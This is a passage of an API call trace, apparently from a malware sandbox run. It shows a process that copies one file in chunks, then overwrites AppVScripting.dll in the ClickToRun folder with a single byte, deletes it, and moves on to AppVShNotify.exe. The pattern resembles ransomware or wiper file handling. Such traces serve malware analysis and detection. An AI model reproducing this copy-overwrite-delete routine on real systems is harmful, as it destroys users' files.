lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.080] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.080] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.081] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.081] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.081] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.081] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.081] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.081] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.081] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.081] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.082] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.082] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.082] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.082] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.082] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.082] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.083] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.083] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.083] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.083] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.083] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.083] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.083] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.084] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.084] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.084] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.084] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.084] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.084] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.085] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.085] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.085] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.085] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.085] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.085] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.085] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.086] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.086] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.086] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.086] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.086] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.086] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.086] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.086] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.087] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.087] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.087] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.087] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.088] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.088] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.088] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.088] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.088] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0xd8, lpOverlapped=0x0) returned 1 [0093.088] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0093.088] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.089] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327ef70*=0xe0, lpOverlapped=0x0) returned 1 [0093.089] CloseHandle (hObject=0x33c) returned 1 [0093.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0093.089] CloseHandle (hObject=0x418) returned 1 [0093.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0093.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0093.090] AreFileApisANSI () returned 1 [0093.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0093.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85080 [0093.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85080, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 76 [0093.090] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0093.094] GetFileType (hFile=0x418) returned 0x1 [0093.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85080 | out: hHeap=0x20000) returned 1 [0093.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0093.094] GetLastError () returned 0xb7 [0093.094] SetLastError (dwErrCode=0xb7) [0093.095] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0093.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0093.096] CloseHandle (hObject=0x418) returned 1 [0093.096] AreFileApisANSI () returned 1 [0093.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0093.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85d00 [0093.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 76 [0093.096] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll")) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0093.097] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.098] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9e226c00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x406d8, dwReserved0=0x1, dwReserved1=0x0, cFileName="AppVShNotify.exe", cAlternateFileName="APPVSH~1.EXE")) returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0093.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0093.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0093.098] AreFileApisANSI () returned 1 [0093.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe", lpUsedDefaultChar=0x0) returned 75 [0093.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0093.098] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0093.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0093.099] AreFileApisANSI () returned 1 [0093.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0093.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85120 [0093.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 75 [0093.099] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0093.099] GetFileType (hFile=0x418) returned 0x1 [0093.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0093.099] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0093.099] 